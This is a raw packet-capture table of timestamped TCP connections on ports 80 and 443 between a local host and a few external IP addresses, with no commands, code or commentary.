                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.038301945 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.039076090 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.039124966 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.039134026 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.039186954 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.040007114 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.040051937 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.040117979 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.040162086 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.040946007 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.040992022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.041057110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.041109085 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.041932106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.041990042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.042026997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.042074919 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.042850971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.042896032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.042960882 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.043005943 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.043776035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.043826103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.043891907 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.043945074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.044733047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.044775009 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.044842005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.044893026 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.045665979 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.045716047 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.045753956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.045795918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.046597004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.046648026 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.046725035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.046772003 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.047558069 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.047606945 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.047672033 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.047713041 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.048516035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.048567057 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.048639059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.048690081 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.049468040 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.049511909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.049585104 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.049632072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.050381899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.050425053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.050489902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.050539970 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.051351070 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.051392078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.051455021 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.051511049 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.052320004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.052366972 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.052377939 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.052416086 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.053220034 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.053267002 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.053328037 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.053370953 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.054152012 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.054203987 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.054255009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.054301977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.055104017 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.055147886 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.055228949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.055272102 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.056045055 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.056090117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.056169987 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.056224108 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.056988001 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.057037115 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.057094097 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.057140112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.057944059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.057986021 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.058099031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.058142900 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.058876991 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.058928013 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.059011936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.059058905 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.059823990 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.059879065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.059950113 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.059993982 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.060822964 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.060873032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.060951948 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.060997963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.061713934 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.061764956 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.061769009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.061806917 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.062731981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.062777042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.062786102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.062832117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.063623905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.063663006 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.063731909 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.063776970 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.064594030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.064646006 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.064713955 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.064760923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.065495968 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.065545082 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.065613985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.065665007 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.066464901 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.066513062 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.066577911 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.066621065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.067384005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.067434072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.067563057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.067605019 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.068330050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.068382025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.068449020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.068523884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.069269896 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.069320917 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.069389105 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.069442034 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.070202112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.070245981 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.070312023 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.070352077 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.071154118 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.071202040 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.071649075 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.071697950 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.072113991 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.072164059 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.072223902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.072273016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.073081970 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.073128939 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.073210001 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.073256969 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.074023008 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.074068069 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.074145079 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.074198008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.074904919 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.074943066 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.075009108 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.075053930 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.075875998 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.075922012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.075959921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.076004028 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.076735973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.076786995 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.219971895 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220046043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220047951 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220063925 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220084906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220105886 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220444918 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220484972 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220721960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220760107 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220834970 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.220873117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.221652985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.221689939 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.221708059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.221745968 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.222593069 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.222635031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.222708941 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.222752094 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.223551989 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.223596096 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.223648071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.223687887 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.224498034 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.224540949 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.224606037 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.224642992 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.225431919 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.225481987 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.225544930 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.225581884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.226402998 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.226440907 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.226510048 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.226547956 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.227324963 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.227361917 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.227437973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.227478027 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.228274107 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.228312016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.228401899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.228440046 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.229209900 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.229254007 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.229321003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.229356050 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.230232000 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.230304003 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.230349064 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.230395079 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.231122971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.231167078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.231245041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.231288910 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.232074976 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.232117891 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.232183933 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.232227087 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.233004093 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.233050108 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.233130932 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.233174086 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.233966112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.234010935 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.234074116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.234116077 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.234894037 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.234932899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.235014915 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.235059023 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.235826969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.235868931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.235934019 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.235974073 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.236816883 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:23.236855984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.683794975 CET4978580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.684300900 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.803898096 CET8049802185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.803967953 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.804241896 CET8049785185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.804297924 CET4978580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.827198982 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.946696043 CET8049802185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.157696009 CET8049802185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.157819033 CET4980280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.171487093 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.171791077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.291425943 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.291466951 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.291495085 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.291527033 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.292627096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.412148952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.895132065 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.895227909 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.895332098 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.898329020 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.898366928 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617867947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617891073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617911100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617934942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617968082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618005037 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618022919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618040085 CET804980431.41.244.11192.168.2.4
